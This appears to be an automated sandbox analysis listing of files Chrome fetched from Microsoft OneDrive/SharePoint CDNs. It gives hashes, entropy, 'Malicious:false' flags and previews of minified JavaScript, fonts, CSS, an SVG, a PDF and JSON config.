                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[243],{4153:function(e,t,n){n.d(t,{a:function(){return i},b:function(){return a},c:function(){return s},d:function(){return o}});var a,i,r=n(725);function o(e){return(null==e?void 0:e.notificationType)===r.b.DataSyncListStatusChange}function s(e){return(null==e?void 0:e.notificationType)===r.b.FonDNotification}!function(e){e[e.UnknownError=0]="UnknownError"}(a||(a={})),function(e){e[e.SetupRequired=0]="SetupRequired",e[e.SignInRequired=1]="SignInRequired"}(i||(i={}))}.,2374:function(e,t,n){n.r(t),n.d(t,{spFolderItemSetItemAutoRefreshControlHandler:function(){return we}});var a,i=n("tslib_102"),r=n("react-lib"),o=n(328),s=n(41),c=n(22),d=n(5),l=n(55),u=n(118),f=n("odsp.util_460"),p=n(898),m=n(8400),_=n(1262),h=n(10);!function(e){e[e.New=0]="New",e[e.Update=1]="Update",e[e.Delete=2]="Delete"}(a||(a={}));var b=12e4,g={ODB:459},v=function(){function e(e){var t=this;this.isImproveRetryLogicKillswitchActivated=f.HW.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Web Open Font Format, TrueType, length 27376, version 1.3277
                                        Category:downloaded
                                        Size (bytes):27376
                                        Entropy (8bit):7.987457135814926
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:5BF1A501ADFAA0CF7F2D438D74265457
                                        SHA1:5F9B1F32D67239653D4A5BCD9A6511B06BE511EF
                                        SHA-256:DFDCF6ABDA03D842FC0CAFC09FCFAA801B4F437D5E6EC5294EB64D8E80788990
                                        SHA-512:6C09BFECCCF8067B8F360ADB32CD9F9CF74E2F9D7906B5EA8C5F804AB9501F36E60104DB307F78AE25972262ADD4B21F68826E7112036D87FDEDB85BCDE44078
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-480b28c8/fluenthybridfont/odsp-next-icons-6109c629.woff
                                        Preview:wOFF......j.................................OS/2.......G...`+Cw.cmap...P.......zh.V1gasp................glyf......_z...4..head..d....5...6#.hhea..d........$....hmtx..d.........0.'cloca..e.........uF..maxp..g ....... ...'name..g8.......O..R.post..j........ ....x.c`a..8...........L..t.!.I.(......@9......VP`px..c....!...X <....N....x...ol.u.... .z.^.~.....0&...A..F.?1....13.C.t.S......l...b.91......&.`..........].z.k..4.:..Q.....<O.}.$..(j.ue..+...`......-....<.+.HxV}L..V.R?VG.Q5.Y...(3/..,x../. .....C!,.[....rX.wB....X......4.3..=..m...!..p.&.4.!C<.O.I9YGB..y..I.%}d.....gd....r.L.i.!...e..5NS.bm.V.......m..[{N.j{.....#.L_.o...[....g._....hM...;.Qd..]F...q.8k.F..1E.Vs..k....i.|....u...jk....h5YA.e..z..k.[.V...S..xI.+... >h{....n.....[s.p.N...3..pF...&.....c._...V..S.S.p..M........t..K'3......I.U.&k...../&..t....y.W...y..y...L..d.f..:L&~713...6.~.&..L~.'.E......U...)..2..Tv.......]r..@~.'. 6.Fy......L.ur=.(?..:..>'..)9.'.*.'/..e?..!|......x3....P..
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (7030)
                                        Category:downloaded
                                        Size (bytes):7080
                                        Entropy (8bit):5.446666911493618
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:7A644F10A5731C70C6F6EE35A858F00C
                                        SHA1:0E4588D8AFA0BE95AFF8EB9D82E35BB47C8F8A8A
                                        SHA-256:23E160E5446EE4D46B9BC477EEFF7A718416F9CDE3FBD29263D0684CFA940E81
                                        SHA-512:E951CFE10AB9F593155C062128E19758872935E0066ABA2B2E3DBA8F64C59908E65183E87CE723A2B3D3E763A47743015C13E59F369374439D1AAB49D015DDDC
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/9.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[9],{3516:function(e,t,n){n.d(t,{a:function(){return v},b:function(){return S},c:function(){return D},d:function(){return y}});var a,i=n("tslib_102"),r=n(1933),o=n(785),s=n(500),c=n(66),d=n(2786),l=n(1807),u=n(2927),f=n("odsp.util_460"),p=n(2979),m=f.HW.isActivated("b7f49711-c56b-4749-a1bc-a91875390f45"),_=f.HW.isActivated("54b0c38f-b2dc-4be3-98ff-627ec8e4bdef"),h=((a={})[d.c.icon]={key:"type",index:0,isVisibleMobile:!0,isCollapsable:!1,type:l.a.FileIcon},a[d.c.name]={key:"name",index:1,isRowHeader:!0,isVisibleMobile:!0,isCollapsable:!1,minWidth:d.a.nameMin,width:d.a.nameODB,type:l.a.Name},a[d.c.title]={key:"Title",index:1,isVisibleMobile:!0,isCollapsable:!1,minWidth:d.a.nameMin,width:d.a.nameODB,type:l.a.Title},a[d.c.shareHeroCommand]={key:"_shareHeroCommand",index:2,isVisibleMobile:!1,isCollapsable:!0,minWidth:16,width:18,type:l.a.ShareCommand},a[d.c.calloutInvoker]={key:"_calloutInvoker",index:3,isVisibleMo
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (44971)
                                        Category:downloaded
                                        Size (bytes):52635
                                        Entropy (8bit):5.391405624712577
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:044851E361725F5942D025ED4CE6C420
                                        SHA1:8608489E3B115877C973ED901D935FDB681B6765
                                        SHA-256:96C73B894BCEBBF3816A7F05458B8603741A46046DAA54F41125747016B20E4D
                                        SHA-512:8B2DAC7F9D26F210AF6796930095CC6356D64C18E28C9CD077E06138AB28D365570300113AF038CDC7F16996FEE7A8F57D7E24B677BB44A1F45512FF33692F43
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/168.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[168],{2135:function(e,t,n){n.r(t),n.d(t,{ContextualControlHandlersProvider:function(){return u},ControlHandlerProvider:function(){return l},RootContextualControlHandlerBridge:function(){return r.b},controlHandlersMemoizer:function(){return d},createContextualControlHandlerProvider:function(){return r.c},createUseElementsWithContextualControlHandlers:function(){return r.d},renderChildrenWithControlHandlers:function(){return f},renderElementsWithContextualControlHandlers:function(){return m},useComposedControlHandlers:function(){return _},useElementsWithContextualControlHandlers:function(){return p}});var a=n("tslib_102"),i=n("react-lib"),r=n(94),o=n(1),s=n("fui.util_369"),c=n(43),d=(0,s.dY)(function(e){return(0,s.dY)(function(t){return(0,a.W_)((0,a.W_)({},e),(0,c.b)(t,function(t,n){var a=o.a.get(n),i=e[a.id];return i&&a.compose(t,i)||t}))})});function l(e){var t=e.controlHandlers;return p(e.children,t)}functio
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text
                                        Category:downloaded
                                        Size (bytes):14730
                                        Entropy (8bit):4.846925666070396
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:FE46325BF6167047462E10177C5D208F
                                        SHA1:B54445BCCC3F97503835D374A8BEEDE48759723D
                                        SHA-256:E46A8F98BDF831BBDCA0057CD9F046E6454C85478BDE2202A8FAEE6BDBF7B683
                                        SHA-512:48ABC256D7AFE259A19624518F7C18DEF32759886CCC94FA41D02DEBD2729171ECA2B2621A4DE0B58351D19FDAD33C6D2CA2FB91EB03A1710478143AC76D3F15
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/fabric-cdn-prod_20240610.001/onedrive-assets/onedrive-font-face-definitions.css
                                        Preview:./* Leelawadee UI (Thai and Lao) does not have a 'light' weight, so we the 'semilight' weight instead. */.@font-face {. font-family: 'Leelawadee UI Web';. src: url('https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-semilight.woff2') format('woff2'), url('https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-semilight.woff') format('woff');. font-weight: 100;. font-style: normal;.}..@font-face {. font-family: 'Leelawadee UI Web';. src: url('https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-semilight.woff2') format('woff2'), url('https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-semilight.woff') format('woff');. font-weight: 300;. font-style: normal;.}..@font-face {. font-family: 'Leelawadee UI Web';. src: url('https://static2.sharepointonline.com/files/fabric/assets/fonts/leelawadeeui-thai/leelawadeeui-regul
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Unicode text, UTF-8 text, with very long lines (5314)
                                        Category:dropped
                                        Size (bytes):26769
                                        Entropy (8bit):5.391632384962596
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:70F5B46ADE9A17096E488AC0940752BF
                                        SHA1:B4EB60BFDAB6202218454ABC2C2637C5C0461093
                                        SHA-256:0E503860A5FC7C48C0888702E6332BC541A662010B59B9710FF0465A0F83508A
                                        SHA-512:FA3D7B29F74F203CD5D3E5FDC489A1DC998E7214CE7EA8D788081D305C6E2C4A4BCF6369EAED599843F6EB3C1E7A18044EC23726BDA6B90912541D8A884B1315
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[52],{4663:function(e,t,n){n.d(t,{a:function(){return O}});var a=n("tslib_102"),i=n("react-lib"),r=n(3),o=n(8),s=n(38),c=n(9),d=n("odsp.util_460"),l=n(45),u=n(34),f=n(6),p=n(15),m=n(4101),_=n(3520),h=n(56),b=n(3517),g=n(41),v=n(66),y=n(352),S=n(5),D=n(11),I=(0,n(19).a)(function(){return(0,a.Zd)(void 0,void 0,void 0,function(){return(0,a.qr)(this,function(e){switch(e.label){case 0:return[4,Promise.all([n.e("ondemand.resx"),n.e(0),n.e(2),n.e(4),n.e(3),n.e(5),n.e(7),n.e(43),n.e(940)]).then(n.bind(n,4291))];case 1:return[2,e.sent().ApproveRejectDialog]}})})}),x=(0,r.c)(function(e,t){var n=t.onContinue,r=t.onCancel,o=t.resolve,s=t.reject,c=(0,a.l7)(t,["onContinue","onCancel","resolve","reject"]);return i.createElement(I,(0,a.W_)({},c,{onContinue:function(e){return(0,a.Zd)(void 0,void 0,void 0,function(){return(0,a.qr)(this,function(t){switch(t.label){case 0:return n?[4,n(e)]:[3,2];case 1:t.sent(),t.label=2;case 2:r
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Java source, ASCII text
                                        Category:dropped
                                        Size (bytes):742
                                        Entropy (8bit):5.242289206051459
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:517818491E8F06C178BFA9446E3CAD2D
                                        SHA1:5B7D5C10D555E618C09247C1278EE80CFD249BDB
                                        SHA-256:D27A4A00EEF6AAA419D3C8D6DC41F528CEBBD7B6ADBC5F7541B4EE81BD79CC7C
                                        SHA-512:56788EE2E7A2DB2B0C336F50FF71025D622B2346658B326DFD7E407A8E5AFB14DA2C6B2E0E833B0336D603973A8B676725F44CE2FFE8CFC8DCE3CBB0304429D3
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:self._perfMarks = {};.self._markPerfStage=function(key) {if(self.performance && typeof self.performance.now === 'function'){self._perfMarks[key]=self.performance.now();} else{self._perfMarks[key]=Date.now();} if (self.performance && typeof self.performance.mark === 'function') {self.performance.mark(key);}};.(typeof self._markPerfStage === 'function' && self._markPerfStage('importScriptsStart'));.self._cdnBaseUrl = 'https://res-1.cdn.office.net/files/odsp-web-prod_2024-08-23.009/';.importScripts('https://res-1.cdn.office.net/files/odsp-web-prod_2024-08-23.009/spwebworker.js');.self._wwKillSwitches = {'48FEA7A5-5A77-480B-94EB-43F1937DF4D6':true};.(typeof self._markPerfStage === 'function' && self._markPerfStage('importScriptsEnd'));.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):72
                                        Entropy (8bit):4.241202481433726
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:9E576E34B18E986347909C29AE6A82C6
                                        SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                        SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                        SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (12337)
                                        Category:downloaded
                                        Size (bytes):14388
                                        Entropy (8bit):5.270869042619528
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:A2A6739CFBB7BCDB6A0825A167995E57
                                        SHA1:04BB76BF2384AEEE2511E9ADFB17316F3397CC81
                                        SHA-256:39ED9F23440FBE03179E723E651F56BB81780D8C52B007D048F9698B1D73EA46
                                        SHA-512:944E3DD31D25DCDF1DACDCC423A924060DD78051B29E1070024E322870D9276BBEA44AEF054CFF4FA5CA78382AB3AB8A3E5D29C6FB3558034759D95D6295D461
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/166.js
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[166],{4679:function(e,t,n){n.d(t,{a:function(){return a}});var a={public:"Public",private:"Private"};t.b=a}.,3116:function(e,t,n){n.r(t),n.d(t,{createSearchRoot:function(){return o},getItemStatistics:function(){return s},getProperties:function(){return r},getUserFromOwsString:function(){return c}});var a=n(2482),i=n(592);function r(e){for(var t={},n=0,a=e.results;n<a.length;n++){var i=a[n],r=i.Key,o=i.Value;switch(i.ValueType){case"Edm.Boolean":t[r]={false:!1,true:!0}[o];break;case"Edm.Double":t[r]=parseFloat(o);break;case"Edm.Byte":case"Edm.Int32":case"Edm.Int64":t[r]=parseInt(o,10);break;case"Null":t[r]=null;break;case"Edm.String":if("Edges"===r){for(var s=JSON.parse(o),c=0,d=s;c<d.length;c++){var l=d[c];l.Properties.BlobContent&&(l.Properties.BlobContent=JSON.parse(l.Properties.BlobContent.toString()))}t[r]=s}else t[r]=o;break;default:t[r]=o}}return t}function o(e){var t=new a.a(e.key);return t.type=i.a.Fo
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (4142)
                                        Category:dropped
                                        Size (bytes):9803
                                        Entropy (8bit):5.201882695658141
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:29A1033FBEF8490B680AF5A044B70D1D
                                        SHA1:CD1D88026A834530D2181865BD02D21BCFE9194B
                                        SHA-256:08CEEF1E37757A038CAE62D3F2483A4C238A3F491EF16A76C8EF0F96D424E630
                                        SHA-512:74EC5FD0C8163FFA0A38A53F9868BF6254C7788CCABC835DCA28F5B27A485B9F36DB5816C78E026FD69E3D1053813A766DF60189C2194682F168304F23BA0CC5
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[343,2037],{2488:function(e,t,n){n.d(t,{a:function(){return a},b:function(){return i}});var a,i={queued:0,started:1,completed:2,aborted:3,failed:4,none:5};!function(e){e[e.none=0]="none",e[e.other=1]="other",e[e.general=2]="general",e[e.conflict=3]="conflict",e[e.similarNameExists=4]="similarNameExists",e[e.invalidName=5]="invalidName",e[e.fileSize=6]="fileSize",e[e.emptyFileOrFolder=7]="emptyFileOrFolder",e[e.emptyFileOrFolderForDocLib=8]="emptyFileOrFolderForDocLib",e[e.overQuota=9]="overQuota",e[e.accessDenied=10]="accessDenied",e[e.lockMismatch=11]="lockMismatch",e[e.overQuotaSharedFolder=12]="overQuotaSharedFolder",e[e.folderUploadNotSupported=13]="folderUploadNotSupported",e[e.versionMismatch=14]="versionMismatch",e[e.authFailure=15]="authFailure",e[e.fileHashMismatch=16]="fileHashMismatch",e[e.targetFolderMissing=17]="targetFolderMissing",e[e.itemNotFound=18]="itemNotFound",e[e.malwareDetected=19]="malw
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:SVG Scalable Vector Graphics image
                                        Category:dropped
                                        Size (bytes):1295
                                        Entropy (8bit):4.631559730621798
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:D8BC1E0477C2B78DCE411B8667174792
                                        SHA1:D61346EF8D47D542E920A23810ED498C90CAD564
                                        SHA-256:AD4E6AE7D9CA460DFC023E5B03C48787F04AA41939DCA25026D0C5064C2C502A
                                        SHA-512:307B8CA6711D615729A7D550B3A95EB35B8C9B7F838F75FFC9D0A1B4D2287F1E7654DF709071605FFE8FD0C5AAE12EDAA6AE83003446DC40E5546ABF56DE49CA
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:<svg width="32" height="32" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M6.5 29h19c.275 0 .5-.225.5-.5V9h-4.5c-.827 0-1.5-.673-1.5-1.5V3H6.5c-.275 0-.5.225-.5.5v25c0 .275.225.5.5.5z" fill="#fff"/><path d="M25.293 8 21 3.707V7.5c0 .275.225.5.5.5h3.793z" fill="#fff"/><path opacity=".67" fill-rule="evenodd" clip-rule="evenodd" d="m26.56 7.854-5.414-5.415A1.51 1.51 0 0 0 20.086 2H6.5C5.673 2 5 2.673 5 3.5v25c0 .827.673 1.5 1.5 1.5h19c.827 0 1.5-.673 1.5-1.5V8.914c0-.4-.156-.777-.44-1.06zM21 3.707 25.293 8H21.5a.501.501 0 0 1-.5-.5V3.707zM6.5 29h19c.275 0 .5-.225.5-.5V9h-4.5c-.827 0-1.5-.673-1.5-1.5V3H6.5c-.275 0-.5.225-.5.5v25c0 .276.224.5.5.5z" fill="#605E5C"/><path fill-rule="evenodd" clip-rule="evenodd" d="M23.5 13h-15a.5.5 0 0 1 0-1h15a.5.5 0 0 1 0 1zm0 2h-15a.5.5 0 0 1 0-1h15a.5.5 0 0 1 0 1zm-15 2h15a.5.5 0 0 0 0-1h-15a.5.5 0 0 0 0 1z" fill="#C8C6C4"/><path fill-rule="evenodd" clip-rule="evenodd" d="M13 19h6a2 2 0 0 1 2 2v4a2 2 0 0 1-2 2h-6a2 2 0 0 1-2-2v-4a2 2 0 0 1 2-2zm
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (65461)
                                        Category:downloaded
                                        Size (bytes):182594
                                        Entropy (8bit):5.473653052092742
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:4CC5A6DFC356D203C1E29099C40A0795
                                        SHA1:3731F8B740FDE9E05E9DF1587A254182D648EC97
                                        SHA-256:ED9839377F0DC8762371EF2B39839BDA6959DF82991DA3FD979965D99F54ED3B
                                        SHA-512:363CA7C4A55DF88CE2342681779264A0398C8805AA6B268A9C01F93B241B700785389680555AD71E5717115F767F93CCBECD81CDB22D44D1023B134DA88C1924
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/sp-client/odsp.fluentui.core/fui.core-58e89b1d.js
                                        Preview:/*! For license information please see fui.core-58e89b1d.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["fui.core"],{"fui.core_351":(e,t,n)=>{n.d(t,{DHS:()=>gs,tzk:()=>fs,var:()=>Cs,_iA:()=>Ei,nl3:()=>Ai,viy:()=>Yr,o2X:()=>Oi,gP_:()=>Ti,LUr:()=>ms,gtT:()=>wi,aDD:()=>Qr,Oa1:()=>Ss,qIe:()=>qr,uJ1:()=>p,YqS:()=>Nr,KuX:()=>or,t6J:()=>sr,hUq:()=>xs,AZ9:()=>Os,c01:()=>it,WxX:()=>$e,qGn:()=>Li,r6K:()=>f,Bfw:()=>u,uTr:()=>l,R0y:()=>bs,iJB:()=>k,mRq:()=>L,$gw:()=>ir,zjq:()=>rr,ttl:()=>Qi,CaY:()=>Yi,dyo:()=>Is,Xf7:()=>we,P87:()=>lo,Kqz:()=>lo,mzW:()=>ws,i1u:()=>Fi,EU_:()=>Hi,TDV:()=>hs,d8B:()=>ls,J5O:()=>ds,KBr:()=>Ds,bkl:()=>_s,Ok$:()=>gi,EWy:()=>Ao,p2S:()=>_i,wpc:()=>Ni,Wl:()=>ki,T_S:()=>ps,L_j:()=>bo,j8X:()=>Mi,iDo:()=>Pi,fXG:()=>Ui,X$8:()=>st,_9Q:()=>ot,t7O:()=>ys,KBT:()=>D,k1S:()=>S,_hP:()=>y,gKr:()=>I,VOd:()=>x,X82:()=>h,KrN:()=>_,mpj:()=>m,OKK:()=>C,EJg:()=>b,PSQ:()=>g,V1H:()=>v,CTe:()=>Me,xYP:()=>Pe,QVF:()=>ei,x5K:()=>yo,JOJ:()=>Si,KZM:()=
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (29435)
                                        Category:dropped
                                        Size (bytes):35472
                                        Entropy (8bit):5.324623793525526
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:7E082CE7BEF65984C421DECDEF07E0DD
                                        SHA1:9C3B0A07D8DA5AB71592B7E3D71848185EEED534
                                        SHA-256:E2A9B5DE6AA5AAABD68D946496CCAFC958AF80BB593B584520FBDD84C69B0C03
                                        SHA-512:50B3427B1BCAC184CFC7F554924645313E35125110B70666E3B4BE2E507C4A513760781D4F73BE74BE2B6E690D351BE206B181FA5340AF77F9C5F1C7AEBC871B
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[47],{7934:function(e,t,n){n.d(t,{a:function(){return F},b:function(){return H}});var a=n("tslib_102"),i=n(3274),r=n(222),o=n(499),s=n(888),c=n(2810),d=n(4144),l=n(3276),u=n(3277),f=n(3199),p=n(2892),m=n(3120),_=n(3278),h=n(3541),b=n(3279),g=n(326),v=n(265),y=n(3815),S=n(2786),D=n(53),I=n(1762),x=n("odsp.util_460"),C=n(1775),O=n(3198),w=n(269),E=n(3119),A=!x.HW.isActivated("48d0bf6b-2e41-42a8-a3a3-e8d2ef405dbb","7/14/2022","better error handling"),L=x.HW.isActivated("3e85cd31-2807-44c1-96bf-35f08619ec11","1/31/2023","Fix for not appending navId to SPL link"),k=x.HW.isActivated("edb05947-5f5b-47a0-91ef-ddc0cef4e7a1","07/03/2024","sbarrameda: fix to use loginName if userId is undefined"),M=x.HW.isActivated("46a06a91-966f-47f1-af68-09d8b3864e12","07/03/2023","Override navId with navIdSendLinkOverride")||x.IT.isFeatureEnabled({ECS:1107386}),P=x.HW.isActivated("62a4337e-d21e-407b-b2ef-2163777d20b8","12/19/2022","Li
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:TrueType Font data, digitally signed, 25 tables, 1st "DSIG", 58 names, Unicode, \251 2017 The Monotype Corporation. All Rights Reserved.
                                        Category:downloaded
                                        Size (bytes):1045960
                                        Entropy (8bit):6.56684947942648
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:559E2C661BDA0DF1442C897454FC98A2
                                        SHA1:77B225A694C39468A15EA94754EAF5EDC93F2E02
                                        SHA-256:BAA251526D6862712A58E613EF451D8A2B60482142EC6AAB1D47FB8E23E21A7C
                                        SHA-512:7A48C6EDBB59B4FA814AB186F142389DAEBB7B8FE5DE76191C489D97320F00708542193FA7E3836F1654447F6AB23C75D434C05A6C249182DB47F197526C91CB
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/item-viewer-pdf/media/fonts/arial.ttf
                                        Preview:............DSIG..F...D..!.GDEF...f..4....XGPOS2.....7.....GSUB..k...O.....JSTFm*i.........LTSH*6....I.....OS/2.J]........`PCLT.{>C..4H...6VDMXP.j...[L....cmap.Bg'......(.cvt .....XX...nfpgm8..+..@x....gasp...!..48....glyf./.t......JZhdmx.N3...l.....head.yb........6hhea.3.........$hmtx%..)...x..G.kern7a96...4...`loca`,.J..^...G.maxp........... meta...a.......`name-1..........post.*....4.... prep......L(.../..........._.<...........'*.........g...Q.................>.N.C.....z.............................<.........@......./.................3.......3.....f....................x[........TMC .@. .....Q.3.>..@........&..... ...........9...9...9.....^.s...s.I...w.V.X...Z...|...|...@...r.9.....A.9...9...s.U.s...s.<.s.V.s...s.U.s.M.s.a.s.S.s.U.9...9.....p...r...p.s.Z...o.V...V.....f.....V.......9.m.....9.....7.V...s...........9.c.V...9.X.....V.\...0.....V.......V...V.....).9...9...9.'...6.s.....Y.s.J.s.....P.s.F.s.K.9...s.B.s.......................s...s.D.s...s.H.......?.9.$.s..............
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PDF document, version 1.7, 1 pages
                                        Category:dropped
                                        Size (bytes):102841
                                        Entropy (8bit):7.916011311556795
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:E7147E541B022EEADE2109F6FAE79086
                                        SHA1:A5E075000B14353A92EAAC0556600D75B658C9C9
                                        SHA-256:0F2887C1BFF6DBEF58AD04872CB6208E75E3949525C46C89C854661FBA3FCC42
                                        SHA-512:B228C2B34A9E2B023EB76C0B98177CF57F59F54E4F49B5B3456F935A2D92E53E51E1B987902371087E49707EDD60330DCAF2B53139A428358175F1BE5504C97C
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 20 0 R/MarkInfo<</Marked true>>/Metadata 68 0 R/ViewerPreferences 69 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 1/Kids[ 3 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</ExtGState<</GS5 5 0 R/GS8 8 0 R>>/Font<</F1 6 0 R/F2 9 0 R/F3 11 0 R/F4 13 0 R/F5 17 0 R>>/XObject<</Image16 16 0 R/Image19 19 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 15 0 R] /MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 1518>>..stream..x..Z[o.W.~G.?...Z.../U...q.Jn..R...d..jp0........!,:N..k...73gn.8...^...}8...5.9>..w......W...x..;.<h.7..J2.aZu;.n.....<J,......+...,..0.....w;o......... 9..0.3........'.4.n..)....(...O.......o..[.9.v.-.Y...`.T....*.`R.5.ZjB.0,.5e8R6."..+...!.C]c..Sf...[(...u`.np...,uqY.L<...G..?..H..H.LB....J..b@.Y...mi..B0..Q.y...4H......j.(5.b.5.38..q...q
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JSON data
                                        Category:downloaded
                                        Size (bytes):895
                                        Entropy (8bit):4.5234737226479105
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:A65AE170D0ACBFC417E1A3DAD6259E90
                                        SHA1:83C8C41B589E9866A45E9D463288BB30D268CA75
                                        SHA-256:76A7D32EEAF41ACEC1EDCDAB7176C7C07C7DFF563C4BB15D48788ECC2E849AC8
                                        SHA-512:518D7193E873DE941469A7A80FF41E191C38FA1E1A47573D70FBF6C361B61A269EC806DFCFEAFFB06C8D2E24B85927A0FB8413097DFC8EC31204CBDF0DEA4AE9
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://config.fp.measure.office.com/conf/v2/o365se/fpconfig.min.json?monitorId=O365se
                                        Preview:{"s":1000,"n":3,"e":[{"e":"*.fp.measure.office.com","w":1000000,"m":128},{"e":"graph-next.fp.measure.office.com","w":4,"m":128},{"e":"outlook.cloud.microsoft","w":4,"m":128},{"e":"outlook.office.com","w":20,"m":128},{"e":"outlook.office365.com","w":20,"m":128},{"e":"ow1.res.office365.com","w":20,"m":1},{"e":"pp1.prd.attend.teams.microsoft.com","w":1,"m":128},{"e":"pp1.prd.bmc.teams.microsoft.com","w":1,"m":128},{"e":"teams.cloud.microsoft","w":4,"m":128},{"e":"tr-ofc-afdwac.office.com","w":10,"m":128},{"e":"tr-ofc-atm.office.com","w":10,"m":128},{"e":"tr-ofc-mira.office.com","w":10,"m":128},{"e":"tr-ooc-acdc.office.com","w":20,"m":128},{"e":"tr-ooc-atm.office.com","w":20,"m":128},{"e":"tr-ooc-fs.office.com","w":4,"m":128},{"e":"tr-ooc-geo.office.com","w":4,"m":128}],"r":["upload.fp.measure.office.com/r.gif","upload.fp.measure.office.com/r.gif","upload2.fp.measure.office.com/r.gif"]}
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (53652)
                                        Category:downloaded
                                        Size (bytes):85593
                                        Entropy (8bit):5.326778156887085
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:6C0A843596606025E100D572FBC11BBF
                                        SHA1:75B3039B9B764C215C7DDF1F5E4157C64F1E0C29
                                        SHA-256:25C40AB7B56414EEC709B2398D31BE6B71853F1BCCE5CB1F462B679F5902AE69
                                        SHA-512:A1BDCAA400820ECF223976BB50207B7AB27375683E87F4249BB9ADEB01532D3BEC384EE3BBA81D010026BBF01EE900D9BE4BD616A937720CA82F9184EABAB603
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-09-06.004/odblightspeedwebpack/505.js
